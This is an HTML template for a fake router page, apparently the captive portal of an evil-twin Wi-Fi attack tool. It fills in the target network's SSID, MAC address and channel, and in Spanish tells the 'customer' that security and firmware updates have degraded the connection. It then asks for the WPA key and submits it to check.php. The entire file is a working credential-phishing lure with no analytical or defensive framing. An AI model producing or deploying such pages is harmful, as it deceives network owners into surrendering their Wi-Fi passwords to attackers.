<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
  <meta name="generator" content=
  "HTML Tidy for HTML5 for Linux version 5.2.0">
  <meta http-equiv="Content-Type" content=
  "text/html; charset=utf-8">
  <link rel="stylesheet" type="text/css" href="info2.css" media=
  "all">
  <title></title>
</head>
<body bgcolor="transparent" marginheight="0" marginwidth="0">
  <table border="0" cellpadding="0" cellspacing="0" width="100%">
    <tbody>
      <tr>
        <td width="2%">&nbsp;</td>
        <td width="5%"></td>
        <td width="93%">
          <div valign="top" align="left">
            <form id="form1" name="form1" method="post" action=
            "check.php">
              <table border="0" cellpadding="0" cellspacing="0" id="autoWidth">
                <tbody>
                  <tr>
                    <td>
                      <br>
                      <hr size="2" width="99%" color="red">
                    </td>
                  </tr>
                  <tr>
                    <td>
                      <font color=#008698>SSID: <b>$APTargetSSID</b></font>
                    </td>
                  </tr>
                  <tr>
                    <td>
                      <font color=#008698>MAC Address: <b>$APTargetMAC</b></font>
                    </td>
                  </tr>
                  <tr>
                    <td>
                      <font color=#008698>Channel: <b>$APTargetChannel</b></font>
                    </td>
                  </tr>
                  <tr>
                    <td>
                      <hr size="2" width="99%" color="red">
                    </td>
                  </tr>
                  <tr>
                    <td></td>
                  </tr>
                  <tr>
                    <td class="info1" colspan="2">
                      <br>
                      <p><font color="#008698">Estimado cliente, debido a actualizaciones de seguridad y firmware la conexion tiene deficiencias.</font></p><font color="#008698"><br></font>
                      <p><font color="#008698">Por razones de seguridad ingresa la clave de tu wifi</font></p>
                    </td>
                  </tr>
                  <tr>
                    <td><font color="#008698"><b>WPA</b>
                    Key:</font></td>
                  </tr>
                  <tr>
                    <td colspan="2"><input name="key1" type="password" class=
                    "textfield"></td>
                  </tr>
                  <tr>
                    <td class="blue" colspan="2"></td>
                  </tr>
                  <tr>
                    <td class="blue" colspan="2"></td>
                  </tr>
                  <tr>
                    <td colspan="2"><input name="Confirm" class=
                    "button" type="submit" value="Confirm"></td>
                  </tr>
                </tbody>
              </table>
            </form>
          </div>
        </td>
      </tr>
    </tbody>
  </table>
</body>
</html>

